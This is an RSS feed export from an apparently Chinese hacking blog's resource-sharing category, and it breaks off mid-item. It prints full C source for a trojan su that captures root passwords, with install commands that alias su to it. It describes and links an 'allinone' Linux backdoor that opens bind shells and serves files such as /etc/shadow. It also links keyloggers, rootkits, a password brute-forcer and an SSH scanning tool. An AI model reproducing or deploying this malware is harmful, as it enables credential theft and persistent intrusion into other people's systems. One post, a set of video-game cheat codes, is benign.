<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chinadu&#039;s Blog &#187; 资源共享</title>
	<atom:link href="http://www.4shell.org/archives/category/tools/feed" rel="self" type="application/rss+xml" />
	<link>http://www.4shell.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Fri, 10 Feb 2012 03:53:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>SSHscan – Scanning ports through SSH Port Forwarding</title>
		<link>http://www.4shell.org/archives/2073.html</link>
		<comments>http://www.4shell.org/archives/2073.html#comments</comments>
		<pubDate>Mon, 02 Jan 2012 11:28:09 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[SSHscan]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=2073</guid>
		<description><![CDATA[SSHscan – Scanning ports through SSH Port Forwarding Category: PenTest, Tools, Tutorials / Tag: brutessh, edgessh, forwarding, internal, network, port, scanning, ssh, sshscan / Add Comment SSHscan.py will allow you to scan a internal network through a SSH with port forwarding enabled. The tool allows to create a port forward in localhost for every open port detected in the internal network range. This tool is not one [...]]]></description>
			<content:encoded><![CDATA[<h2><a title="Permalink to: SSHscan – Scanning ports through SSH Port Forwarding" href="http://www.coresec.org/2011/06/23/sshscan-scanning-ports-through-ssh-port-forwarding/" rel="bookmark">SSHscan – Scanning ports through SSH Port Forwarding</a></h2>
<div>Category: <a title="View all posts in PenTest" href="http://www.coresec.org/category/pentest/" rel="category tag">PenTest</a>, <a title="View all posts in Tools" href="http://www.coresec.org/category/software/" rel="category tag">Tools</a>, <a title="View all posts in Tutorials" href="http://www.coresec.org/category/tutorials/" rel="category tag">Tutorials</a> / Tag: <a href="http://www.coresec.org/tag/brutessh/" rel="tag">brutessh</a>, <a href="http://www.coresec.org/tag/edgessh/" rel="tag">edgessh</a>, <a href="http://www.coresec.org/tag/forwarding/" rel="tag">forwarding</a>, <a href="http://www.coresec.org/tag/internal/" rel="tag">internal</a>, <a href="http://www.coresec.org/tag/network/" rel="tag">network</a>, <a href="http://www.coresec.org/tag/port/" rel="tag">port</a>, <a href="http://www.coresec.org/tag/scanning/" rel="tag">scanning</a>, <a href="http://www.coresec.org/tag/ssh/" rel="tag">ssh</a>, <a href="http://www.coresec.org/tag/sshscan/" rel="tag">sshscan</a> / <a href="http://www.coresec.org/2011/06/23/sshscan-scanning-ports-through-ssh-port-forwarding/#respond">Add Comment</a></div>
<p>SSHscan.py will allow you to scan a internal network through a SSH with port forwarding enabled. The tool allows to create a port forward in localhost for every open port detected in the internal network range.</p>
<p>This tool is not one that can be used in every engagement but when you have the opportunity and the need it will came handy.</p>
<p>The tool has been included in the edgeSSH kit, where we will include all the scripts related with SSH, at the moment only bruteSSH, a SSH login bruteforcer and scanSSH are included in the kit.</p>
<p>You can download the code here: <a href="http://www.coresec.org/2011/06/23/sshscan-scanning-ports-through-ssh-port-forwarding/http//code.google.com/p/edgessh" target="_blank">http//code.google.com/p/edgessh</a></p>
<div>Code:</p>
<div>
<div>
<pre>Command line options:        -h: target host       -u: username       -p: password       -l: targets lists to scan       -t: threads       --remote-host: host to scan       --remote-ports: port list to scan       --default-ports: scan default ports       --all-ports: scan all 65535 ports       --keep-tunnels: Forward all open ports</pre>
</div>
</div>
</div>
<p>Examples:</p>
<div>Code:</p>
<div>
<div>
<pre>    scanssh.py -h 192.168.1.55 -u root -p passowrd -t list.txt    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --remote-ports 80,443    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --default-ports</pre>
</div>
</div>
</div>
<p>[source: <a href="http://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html" target="_blank">http://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html</a>]</p>
<h2  class="related_post_title">随机日志</h2><ul class="related_post"><li>2009年08月15日 -- <a href="http://www.4shell.org/archives/1018.html" title="360 模拟点击demo">360 模拟点击demo</a></li><li>2010年01月18日 -- <a href="http://www.4shell.org/archives/1474.html" title="Nokia 5800相机参数设置拍出清晰的照片">Nokia 5800相机参数设置拍出清晰的照片</a></li><li>2008年10月12日 -- <a href="http://www.4shell.org/archives/383.html" title="快客电邮(QuarkMail)远程命令执行漏洞">快客电邮(QuarkMail)远程命令执行漏洞</a></li><li>2008年10月17日 -- <a href="http://www.4shell.org/archives/436.html" title="BackTrack 3 (BT3)中文版，可显示中文文件及文件夹（二）">BackTrack 3 (BT3)中文版，可显示中文文件及文件夹（二）</a></li><li>2006年10月26日 -- <a href="http://www.4shell.org/archives/77.html" title="MSSQL db_owner角色注入直接获得系统权限(续)">MSSQL db_owner角色注入直接获得系统权限(续)</a></li><li>2008年10月12日 -- <a href="http://www.4shell.org/archives/381.html" title="Dbshell">Dbshell</a></li><li>2009年06月26日 -- <a href="http://www.4shell.org/archives/815.html" title="119.21G彩虹表种子【修复可以100%】">119.21G彩虹表种子【修复可以100%】</a></li><li>2008年11月18日 -- <a href="http://www.4shell.org/archives/626.html" title="解决Perl 5.8.8用XML::RSS无法解析非utf-8编码的RSS问题">解决Perl 5.8.8用XML::RSS无法解析非utf-8编码的RSS问题</a></li><li>2009年05月25日 -- <a href="http://www.4shell.org/archives/790.html" title="BaoFeng (config.dll) ActiveX Remote Code Execution Exploit">BaoFeng (config.dll) ActiveX Remote Code Execution Exploit</a></li><li>2008年11月3日 -- <a href="http://www.4shell.org/archives/527.html" title="Discuz! flash Csrf bug">Discuz! flash Csrf bug</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/2073.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>目录Authorization破解工具</title>
		<link>http://www.4shell.org/archives/2070.html</link>
		<comments>http://www.4shell.org/archives/2070.html#comments</comments>
		<pubDate>Mon, 02 Jan 2012 11:26:47 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[Crack]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=2070</guid>
		<description><![CDATA[来自：http://www.007hack.com/?p=635 Web目录下有一些文件不允许匿名访问（可以使用Tomcat、Apache、nginx等进行配制，来实现此效果），如下图： 可以使用以下代码+字典破解，运行结果如下： 主要代码如下（附件中有完整代码，仅供学习！请勿非法使用！）： 点击下载：Crack_pass.rar 随机日志2007年12月10日 -- 通过设置p3p头来实现跨域访问cookie2009年07月24日 -- 央视曝3305万案黑客照片 疑犯福彩机房操作2008年10月20日 -- 公布一批上传页查询关键2008年11月20日 -- Backtrack3的引导配置文件syslinux.cfg2009年08月11日 -- 简单的病毒扫描引擎2008年11月8日 -- 很雷人的：卫生棉花糖2006年11月6日 -- 在肉鸡建立真正完美隐藏的网站2008年10月25日 -- BackTrack雅黑字体lzm下载2009年05月31日 -- 最伟大的100首摇滚单曲2008年10月27日 -- 无线网络实战案例查找隐藏的SSID]]></description>
			<content:encoded><![CDATA[<p>来自：http://www.007hack.com/?p=635</p>
<p>Web目录下有一些文件不允许匿名访问（可以使用Tomcat、Apache、nginx等进行配制，来实现此效果），如下图：</p>
<p><a href="http://www.4shell.org/wp-content/uploads/images/2012/01/112647eN5.jpg"><img title="01" src="http://www.4shell.org/wp-content/uploads/images/2012/01/112647eN5.jpg" alt="" width="439" height="305" /></a></p>
<p>可以使用以下代码+字典破解，运行结果如下：</p>
<p><a href="http://www.4shell.org/wp-content/uploads/images/2012/01/1126483uS.jpg"><img title="1" src="http://www.4shell.org/wp-content/uploads/images/2012/01/1126483uS.jpg" alt="" width="599" height="116" /></a></p>
<p>主要代码如下（附件中有完整代码，仅供学习！请勿非法使用！）：</p>
<p>点击下载：<a title="Crack_pass" href="http://www.4shell.org/tools/Crack_pass.rar" target="_blank">Crack_pass.rar</a></p>
<h2  class="related_post_title">随机日志</h2><ul class="related_post"><li>2009年03月17日 -- <a href="http://www.4shell.org/archives/763.html" title="好诗！好诗也~~~~哇哈哈">好诗！好诗也~~~~哇哈哈</a></li><li>2008年10月17日 -- <a href="http://www.4shell.org/archives/437.html" title="用U盘引导启动硬盘上的BT3的方法">用U盘引导启动硬盘上的BT3的方法</a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2009年07月21日 -- <a href="http://www.4shell.org/archives/906.html" title="Php168 v6 权限提升漏洞">Php168 v6 权限提升漏洞</a></li><li>2008年11月24日 -- <a href="http://www.4shell.org/archives/661.html" title="清除桌面的BlogCID.dat的办法">清除桌面的BlogCID.dat的办法</a></li><li>2008年12月4日 -- <a href="http://www.4shell.org/archives/687.html" title="不被处罚的DIV隐藏连接-目前最流行的SEO做友情连接方法">不被处罚的DIV隐藏连接-目前最流行的SEO做友情连接方法</a></li><li>2007年05月17日 -- <a href="http://www.4shell.org/archives/195.html" title="Windows .ANI LoadAniIcon Stack Overflow">Windows .ANI LoadAniIcon Stack Overflow</a></li><li>2007年12月10日 -- <a href="http://www.4shell.org/archives/259.html" title="公布我的防SQL注入的代码，可记录攻击者IP地址">公布我的防SQL注入的代码，可记录攻击者IP地址</a></li><li>2007年09月16日 -- <a href="http://www.4shell.org/archives/232.html" title="很长时间没来这里了">很长时间没来这里了</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/2070.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>linux Backdoor</title>
		<link>http://www.4shell.org/archives/2059.html</link>
		<comments>http://www.4shell.org/archives/2059.html#comments</comments>
		<pubDate>Thu, 24 Nov 2011 13:23:36 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[后门]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=2059</guid>
		<description><![CDATA[/* /* * kpr-fakesu.c V0.9beta167 * by koper * * Setting up: * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c * admin@host:~$ mv .su /var/tmp/.su * admin@host:~$ cp .bash_profile .wgetrc * admin@host:~$ echo "alias su=/var/tmp/.su"&#62;&#62;.bash_profile * admin@host:~$ logout * *** LOGIN *** * admin@host:~$ su * Password: * su: Authentication failure * Sorry. * [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>/*</p>
<p>/*</p>
<p>* kpr-fakesu.c V0.9beta167</p>
<p>* by koper</p>
<p>*</p>
<p>* Setting up:</p>
<p>* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c</p>
<p>* admin@host:~$ mv .su /var/tmp/.su</p>
<p>* admin@host:~$ cp .bash_profile .wgetrc</p>
<p>* admin@host:~$ echo "alias su=/var/tmp/.su"&gt;&gt;.bash_profile</p>
<p>* admin@host:~$ logout</p>
<p>* *** LOGIN ***</p>
<p>* admin@host:~$ su</p>
<p>* Password:</p>
<p>* su: Authentication failure</p>
<p>* Sorry.</p>
<p>* admin@host:~$ su</p>
<p>* Password:</p>
<p>* root@host:~# logout</p>
<p>* admin@host:~$ cat /var/tmp/.pwds</p>
<p>* root:dupcia17</p>
<p>* admin@host:~$</p>
<p>*</p>
<p>* /bin/su sends various failure information depending on the OS ver.</p>
<p>* Please modify the source to make it "fit" &lt;img src="http://www.4shell.org/wp-content/uploads/images/2011/11/1323384Sm.gif" alt=";)"&gt;</p>
<p>*</p>
<p>*/</p>
<p>#include</p>
<p>#include</p>
<p>#include</p>
<p>main(int argc, char *argv[]){</p>
<p>FILE *fp;</p>
<p>char *user;</p>
<p>char *pass;</p>
<p>char filex[100];</p>
<p>char clean[100];</p>
<p>sprintf(filex,"/var/tmp/.pwds");</p>
<p>sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/test/.wgetrc /home/test/.bash_profile");</p>
<p>if(argc==1) user="root";</p>
<p>if(argc==2) user=argv[1];</p>
<p>if(argc&gt;2){</p>
<p>if(strcmp(argv[1], "-l")==0)</p>
<p>user=argv[2];</p>
<p>else user=argv[1];}</p>
<p>fprintf(stdout,"assword: ");</p>
<p>pass=getpass ("");</p>
<p>system("sleep 3");</p>
<p>fprintf(stdout,"su: Authentication failurenSorry.n");</p>
<p>if ((fp=fopen(filex,"w")) != NULL)</p>
<p>{</p>
<p>fprintf(fp, "%s:%sn", user, pass);</p>
<p>fclose(fp);</p>
<p>}</p>
<p>system(clean);</p>
<p>system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");</p>
<p>}</p></blockquote>
<p>以下三个都是比较经典的backdoor：</p>
<p><span id="more-2059"></span></p>
<p><a title="klogger-1.4" href="http://www.4shell.org/tools/klogger-1.4.gz" target="_blank">http://www.4shell.org/tools/klogger-1.4.gz</a></p>
<p><a title="enyelkm.en.v1.1" href="http://www.4shell.org/tools/enyelkm.en.v1.1.tar.gz" target="_blank">http://www.4shell.org/tools/enyelkm.en.v1.1.tar.gz</a></p>
<p><a title="sshbd" href="http://www.4shell.org/tools/sshbd.tgz" target="_blank">http://www.4shell.org/tools/sshbd.tgz</a></p>
<p>这个是在linux穿墙的，通过53号端口建立隧道：</p>
<p><a title="dns2tcp-0.5" href="http://www.4shell.org/tools/dns2tcp-0.5.tar.gz" target="_blank">http://www.4shell.org/tools/dns2tcp-0.5.tar.gz</a></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1919.html" title="让putty支持中文输入和显示">让putty支持中文输入和显示</a></li><li>2011年04月28日 -- <a href="http://www.4shell.org/archives/1899.html" title=" 一次Linux下的普通渗透测试"> 一次Linux下的普通渗透测试</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/2059.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>allinone: Linux pentest tools</title>
		<link>http://www.4shell.org/archives/2055.html</link>
		<comments>http://www.4shell.org/archives/2055.html#comments</comments>
		<pubDate>Thu, 24 Nov 2011 13:08:04 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[资源共享]]></category>
		<category><![CDATA[allinone]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[pentest]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=2055</guid>
		<description><![CDATA[allinone: Linux pentest tools from HUC China A great app level backdoor in Linux . Very useful while doing Linux pentest. Written by Lion [HUC(Hack Union of China)] at year 2002 The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com) /************************************************************************ * allinone.c for HUC (2002.1) * * allinone.c is [...]]]></description>
			<content:encoded><![CDATA[<p>allinone: Linux pentest tools from HUC China</p>
<p>A great app level backdoor in Linux . Very useful while doing Linux pentest.</p>
<p>Written by Lion [HUC(Hack Union of China)] at year 2002</p>
<p>The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com)<br />
<span id="more-2055"></span><br />
/************************************************************************<br />
* allinone.c for HUC (2002.1)<br />
*<br />
* allinone.c is<br />
* a Http server,<br />
* a sockets transmit server,<br />
* a shell backdoor,<br />
* a icmp backdoor,<br />
* a bind shell backdoor,<br />
* a like http shell,<br />
* it can translate file from remote host,<br />
* it can give you a socks5 proxy,<br />
* it can use for to attack, jumps the extension, Visits other machines.<br />
* it can give you a root shell.:)<br />
*</p>
<p>* Usage:<br />
* compile:<br />
* gcc -o allinone allinone.c -lpthread<br />
* run on target:<br />
* ./allinone<br />
*<br />
* 1.httpd server<br />
* Client:<br />
* http://target:8008/givemefile/etc/passwd<br />
* lynx -dump http://target:8008/givemefile/etc/shadow &gt; shadow<br />
* or wget http://target:8008/givemefile/etc/shadow<br />
*<br />
* 2.icmp backdoor<br />
* Client:<br />
* ping -l 101 target (on windows)<br />
* ping -s 101 -c 4 target (on linux)<br />
* nc target 8080<br />
* kissme:) –&gt; your password<br />
*<br />
* 3.shell backdoor<br />
* Client:<br />
* nc target 8008<br />
* kissme:) –&gt; your password<br />
*<br />
* 4.bind a root shell on your port<br />
* Client:<br />
* http://target:8008/bindport:9999<br />
* nc target 9999<br />
* kissme:) –&gt; your password<br />
*<br />
* 5.sockets transmit<br />
* Client:<br />
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port<br />
* http://target:8008/socks/:1080::192.168.0.1:::21<br />
* nc target 1080<br />
*<br />
* 6.http shell<br />
* Client:<br />
* http://target:8008/givemeshell:ls -al (no pipe)<br />
*<br />
* ps:<br />
* All bind shell have a passwd, default is: kissme:)<br />
* All bind shell will close, if Two minutes do not have the connection.<br />
* All bind shell only can use one time until reactivates.<br />
*<br />
*<br />
* Code by lion, e-mail: lion@cnhonker.net<br />
* Welcome to HUC Website, Http://www.cnhonker.com<br />
*<br />
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)<br />
* Thx bkbll’s Transmit code, and thx Neil,con,iceblood for test.<br />
*<br />
************************************************************************/<br />
Download:<br />
<a title="allinone" href="http://www.4shell.org/tools/allinone.tgz" target="_blank">http://www.4shell.org/tools/allinone.tgz</a></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2012年01月2日 -- <a href="http://www.4shell.org/archives/2074.html" title="How to attack a windows domain">How to attack a windows domain</a></li><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1919.html" title="让putty支持中文输入和显示">让putty支持中文输入和显示</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/2055.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>解决《战争机器》Win7下不能使用修改器问题，用作弊码</title>
		<link>http://www.4shell.org/archives/1922.html</link>
		<comments>http://www.4shell.org/archives/1922.html#comments</comments>
		<pubDate>Sun, 01 May 2011 06:23:55 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[战争机器]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1922</guid>
		<description><![CDATA[Win7下的战争机器不能用修改器和作弊器，XP下却可以正常使用 解决办法： 在\My Documents\My Games\Gears of War for Windows\Binaries里面生成一个文本文件，比如cheat.txt，把你想开的作弊码写进去，比如下面那样 set WarfareGame.Pawn_COGMarcus DefaultHealth 99999 set warfaregame.Weap_locustpistol MaxSpareAmmo 9999 set warfaregame.Weap_locustpistol Magsize 5000 set warfaregame.Weap_cogpistol MaxSpareAmmo 9999 set warfaregame.Weap_cogpistol Magsize 5000 set warfaregame.Weap_locustassaultrifle MaxSpareAmmo 9999 set warfaregame.Weap_locustassaultrifle MagSize 5000 set WarfareGame.Weap_AssaultRifle MaxSpareAmmo 9999 set WarfareGame.Weap_AssaultRifle MagSize 1000 set WarfareGame.Weap_Grenade MaxSpareAmmo 9999 set WarfareGame.Weap_Grenade MagSize 9000 set WarfareGame.Weap_SniperRifle [...]]]></description>
			<content:encoded><![CDATA[<p>Win7下的战争机器不能用修改器和作弊器，XP下却可以正常使用<br />
解决办法：<br />
在\My Documents\My Games\Gears of War for Windows\Binaries里面生成一个文本文件，比如cheat.txt，把你想开的作弊码写进去，比如下面那样</p>
<blockquote><p>
set WarfareGame.Pawn_COGMarcus DefaultHealth 99999<br />
set warfaregame.Weap_locustpistol MaxSpareAmmo 9999<br />
set warfaregame.Weap_locustpistol Magsize 5000<br />
set warfaregame.Weap_cogpistol MaxSpareAmmo 9999<br />
set warfaregame.Weap_cogpistol Magsize 5000<br />
set warfaregame.Weap_locustassaultrifle MaxSpareAmmo 9999<br />
set warfaregame.Weap_locustassaultrifle MagSize 5000<br />
set WarfareGame.Weap_AssaultRifle MaxSpareAmmo 9999<br />
set WarfareGame.Weap_AssaultRifle MagSize 1000<br />
set WarfareGame.Weap_Grenade MaxSpareAmmo 9999<br />
set WarfareGame.Weap_Grenade MagSize 9000<br />
set WarfareGame.Weap_SniperRifle MaxSpareAmmo 9999<br />
set WarfareGame.Weap_SniperRifle MagSize 5000<br />
set WarfareGameContentWeapons.Weap_Bow MaxSpareAmmo 9999<br />
set WarfareGameContentWeapons.Weap_Bow MagSize 5000<br />
set WarfareGameContentWeapons.Weap_Boomer MaxSpareAmmo 9999<br />
set WarfareGameContentWeapons.Weap_Boomer MagSize 9000<br />
set WarfareGame.Weap_Shotgun MaxSpareAmmo 9999<br />
set WarfareGame.Weap_Shotgun MagSize 9000
</p></blockquote>
<p><span id="more-1922"></span></p>
<p>保存，进游戏，打开控制台后输入exec 文件名.txt，用上面的例子就是exec cheat.txt，即可方便地打开所需的作弊码了。改血量的话刚改完主角会变成血红状态，可能是改得太猛的原因，没关系，让人打几枪后就没事了。99999的血量应该足够了，我改完在蝙蝠那关站着不动让蝙蝠秒，再加上几个兽人围攻不还手，硬是撑了差不多10分钟</p>
<p>&nbsp;<br />
----------------------------------------------------------------------------<br />
对应命令的注释：</p>
<blockquote><p>
手雷弹药量  set WarfareGame.Weap_Grenade magsize &lt;number&gt;<br />
机枪弹药量  set WarfareGame.Weap_AssaultRifle magsize &lt;number&gt;<br />
手炮弹药量  set warfaregame.weap_locustpistol magsize &lt;number&gt;<br />
兽人机枪弹药量   set warfaregame.weap_locustassaultrifle magsize &lt;number&gt;<br />
霰弹弹药量  set warfaregame.weap_shotgun magsize &lt;number&gt;<br />
阻击弹药量  set WarfareGame.Weap_SniperRifle magsize &lt;number&gt;<br />
手枪弹药量  set warfaregame.weap_cogpistol magsize &lt;number&gt;<br />
弓箭弹药量  set WarfareGameContentWeapons.Weap_Bow magsize &lt;number&gt;<br />
火箭炮弹药量  set WarfareGameContentWeapons.Weap_Boomer magsize &lt;number&gt;</p>
<p>Baird血量   set WarfareGameContent.Pawn_COGBaird DefaultHealth &lt;number&gt;<br />
Carmine血量   set WarfareGameContent.Pawn_COGCarmine DefaultHealth &lt;number&gt;<br />
Cole血量   set WarfareGameContent.Pawn_COGGus DefaultHealth &lt;number&gt;<br />
Dom血量   set WarfareGame.Pawn_COGDom DefaultHealth &lt;number&gt;<br />
Marcus血量   set WarfareGame.Pawn_COGMarcus DefaultHealth &lt;number&gt;<br />
Minh血量  set WarfareGameContent.Pawn_COGMinh DefaultHealth &lt;number&gt;
</p></blockquote>
<p>----------------------------------------------------------------------------</p>
<blockquote><p>
Assault Rifle(攻击步枪)<br />
Grenade(手榴弹)<br />
Sniper Rifle(狙击手步枪)<br />
Bow(弓)<br />
locust pistol(蝗虫手枪)<br />
cogpistol(左轮手枪)<br />
locust assault rifle(蝗虫攻击步枪)<br />
shot gun(射击枪)<br />
Boomer(火箭炮)<br />
Magic Bullets Timeout Duration(Increase Time for Perfect Active Reload Damage Bonus )
</p></blockquote>
<p>----------------------------------------------------------------------------<br />
关于武器的更多信息查找WarWeapon.ini文件<br />
X:\Program Files\Microsoft Games\Gears of War\WarGame\Config\WarWeapon.ini</p>
<p>WarWeapon.ini内容不能修改，但可以提供给我们控制台命令参数。<br />
例如</p>
<blockquote><p>
[WarfareGame.Weap_AssaultRifle]<br />
InitialMagazines=6<br />
CriticalAmmoCount=10<br />
LastBulletStrongerPercent=0.75f<br />
PRM_Damage=(Value=(20,21,22,23,24))<br />
PRM_DamageAI=(Value=(20,21,22,23,24))<br />
MagSize=60<br />
MaxSpareAmmo=600<br />
...
</p></blockquote>
<p>其中MagSize=60（弹夹大小）可以通过控制台改输入如下（将弹夹大小改成1000）</p>
<p>set WarfareGame.Weap_AssaultRifle MagSize 1000<br />
----------------------------------------------------------------------------<br />
过多的修改也会造成游戏的不稳定，最好挑选自己喜欢的装备修改。以下仅供参考：</p>
<blockquote><p>
//--------------------------血量---------------------------------<br />
set WarfareGame.Pawn_COGMarcus DefaultHealth 99999<br />
set WarfareGame.Pawn_COGDom DefaultHealth 99999<br />
set WarfareGameContent.Pawn_COGCarmine DefaultHealth 99999<br />
set WarfareGameContent.Pawn_COGBaird DefaultHealth 99999<br />
set WarfareGameContent.Pawn_COGMinh DefaultHealth 99999<br />
set WarfareGameContent.Pawn_COGGus DefaultHealth 99999<br />
//--------------------------常规枪----------------------------<br />
set WarfareGame.Weap_AssaultRifle MaxSpareAmmo 99999 //单个弹夹子弹上限<br />
set WarfareGame.Weap_AssaultRifle MagSize 1000 //补给时一个弹夹子弹数量<br />
//--------------------------手榴弹----------------------------<br />
set WarfareGame.Weap_Grenade MaxSpareAmmo 99999<br />
set WarfareGame.Weap_Grenade MagSize 90000<br />
//--------------------------狙击步枪--------------------------<br />
set WarfareGame.Weap_SniperRifle MaxSpareAmmo 99999<br />
set WarfareGame.Weap_SniperRifle MagSize 50000<br />
//--------------------------弓--------------------------------<br />
set WarfareGameContentWeapons.Weap_Bow MaxSpareAmmo 99999<br />
set WarfareGameContentWeapons.Weap_Bow MagSize 50000<br />
//--------------------------手炮-------------------------------<br />
set WarfareGameContentWeapons.Weap_Boomer MaxSpareAmmo 99999<br />
set WarfareGameContentWeapons.Weap_Boomer MagSize 900000<br />
//--------------------------散弹枪-----------------------------<br />
set WarfareGame.Weap_Shotgun MaxSpareAmmo 99999<br />
set WarfareGame.Weap_Shotgun MagSize 90000
</p></blockquote>
<h2  class="related_post_title">随机日志</h2><ul class="related_post"><li>2008年10月19日 -- <a href="http://www.4shell.org/archives/447.html" title="Nuke ET < = 3.4 (fckeditor) Remote Arbitrary File Upload Exploit">Nuke ET < = 3.4 (fckeditor) Remote Arbitrary File Upload Exploit</a></li><li>2008年11月18日 -- <a href="http://www.4shell.org/archives/630.html" title="极品飞车12台湾官网上线 Maggie Q访谈视频">极品飞车12台湾官网上线 Maggie Q访谈视频</a></li><li>2009年08月24日 -- <a href="http://www.4shell.org/archives/1043.html" title="关于MySQL权限">关于MySQL权限</a></li><li>2009年08月16日 -- <a href="http://www.4shell.org/archives/1021.html" title="一个命令可以攻击所有Linux系统">一个命令可以攻击所有Linux系统</a></li><li>2009年07月23日 -- <a href="http://www.4shell.org/archives/935.html" title="《火线保镖》推荐电影">《火线保镖》推荐电影</a></li><li>2009年08月27日 -- <a href="http://www.4shell.org/archives/1057.html" title="Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability">Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability</a></li><li>2009年07月10日 -- <a href="http://www.4shell.org/archives/842.html" title="关于gh0st的一些东西！">关于gh0st的一些东西！</a></li><li>2008年12月1日 -- <a href="http://www.4shell.org/archives/675.html" title="Cain &#038; Abel 4.9.23 (rdp file) Buffer Overflow PoC">Cain &#038; Abel 